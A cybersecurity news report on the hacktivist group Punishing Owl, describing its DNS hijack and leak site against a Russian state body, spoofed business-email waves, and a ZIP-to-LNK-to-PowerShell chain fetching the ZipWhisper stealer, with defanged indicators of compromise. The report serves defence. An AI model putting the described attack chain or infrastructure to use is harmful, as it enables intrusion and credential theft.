Punishing Owl, a new hacking group, claimed to have gained access to a Russian state security organization's networks. The group shared evidence on social media, including links to a duplicate stash on Mega.nz and a defacement leak site (DLS) that hosted stolen internal documents. The group presents itself as a collective when speaking in plural.

DNS Defacement and Hijacking Techniques By taking advantage of DNS access in the victim's domain zone, Punishing Owl went one step further. They hacked and made a subdomain. [REDACTED].ru, and redirected it to a Brazilian server along with the root domain. A political manifesto denouncing the victim and links to stolen files were hosted on that server.

The attackers added a fake TLS certificate for the victim’s domain, issued that same day.

In order to simulate email services, they also opened SMTP and IMAP ports. DLS-pесурс с файлами жертвы (Source: habr) By tricking users from the official website into the DLS, this setup informed partners and clients about the breach. By postponing weekend responses, the Friday 18:37 post timing maximized exposure.

Details of the Indicator DLS Server Brazilian IP hosting files, manifesto, fake TLS cert Subdomain hacked. [REDACTED].ru (DNS delegated to Brazil) Services IMAP/SMTP ports active on DLS server BEC Follow-Up Attacks A few days later, Punishing Owl used business email compromise (BEC) emails to target the victim's partners. First wave came from punishingowl@[REDACTED] (via the Brazilian server), announcing the breach and linking to the hijacked DNS. An hour later, a second wave spoofed a victim employee email.

These demanded that password-protected ZIP archives containing "confirming documents" be reviewed immediately. Punishing Owl Targets Russia (Source: habr) Headers linked to the same Brazilian server and disclosed the group's email address, punishingowl@atomicmail[.]io. By using a double extension trick, the ZIPs concealed an LNK file under the guise of a PDF.

When it was opened, a hidden PowerShell command was used to retrieve the ZipWhisper stealer from the C2 server bloggoversikten[. ]com (82.221.100[.]40). Browser data is scraped by ZipWhisper, zipped into files such as [USERNAME]-home-part[CHUNK].zip in AppData/Local/Temp, and then uploaded via /upload/[COMPUTERNAME]/[USERNAME]. A "generated at" timestamp in one sample's code alluded to AI scripting tools.

The C2 domain imitates a legitimate Russian tech blog that was active until 2015 before being re-registered for attacks in 2025.

IOC Type Value C2 Domain bloggoversikten[. ]com C2 IP 82.221.100[. ]40 Payload ZIP > LNK > PowerShell (ZipWhisper stealer) Upload Path /upload/[HOST]/[USER] Group Email punishingowl@atomicmail[.

]io Punishing Owl targets only Russian critical infrastructure, including state agencies, research firms, and habr IT outfits. From December 12–19, 2025, new social media, dark web forum accounts, and online services appeared, indicating a new player establishing its brand. Russia Is the Target of Punishing Owl (Source: habr) Kazakhstan is the geolocation of one social account. They even shared a public victim graph.

In today’s tense geopolitics, PT ESC predicts more politically driven hacktivists targeting Russian cyberspace. Punishing Owl’s custom tools, prolonged stealth, and dark web branding signal staying power not a one-off stunt. PT ESC’s Threat Intelligence team will track them via PT Fusion.

Be on the lookout for stealers, patch DNS controls, and keep an eye out for unusual subdomains. Set Cyberpress as a Preferred Source in Google